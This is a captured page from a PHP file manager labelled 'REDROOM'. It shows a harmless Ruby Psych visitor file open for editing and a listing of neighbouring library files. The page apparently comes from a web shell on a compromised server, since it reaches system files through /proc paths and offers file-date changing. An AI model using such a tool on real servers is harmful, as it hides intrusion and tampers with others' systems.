REDROOM
PHP 8.2.31
Path:
Logout
Edit File
Size: 359 B
Close
/proc/thread-self/root/opt/alt/ruby26/lib64/ruby/2.6.0/psych/visitors/visitor.rb
Text
Base64
# frozen_string_literal: true module Psych module Visitors class Visitor def accept target visit target end private DISPATCH = Hash.new do |hash, klass| hash[klass] = "visit_#{klass.name.gsub('::', '_')}" end def visit target send DISPATCH[target.class], target end end end end
Save
Close
Exit & Reset
Text mode: syntax highlighting auto-detects file type.
Directory Contents
Dirs: 0 × Files: 6
Delete Selected
Select All
Select None
Sort:
Name
Size
Modified
Enable drag-to-move
Name
Size
Perms
Modified
Actions
depth_first.rb
626 B
lrw-r--r--
2023-07-26 15:03:15
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
emitter.rb
1.45 KB
lrw-r--r--
2023-07-26 15:03:15
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
json_tree.rb
587 B
lrw-r--r--
2023-07-26 15:03:15
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
to_ruby.rb
11.28 KB
lrw-r--r--
2023-07-26 15:03:15
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
visitor.rb
359 B
lrw-r--r--
2023-07-26 15:03:15
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
yaml_tree.rb
15.36 KB
lrw-r--r--
2023-07-26 15:03:15
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
Zip Selected
If ZipArchive is unavailable, a
.tar
will be created (no compression).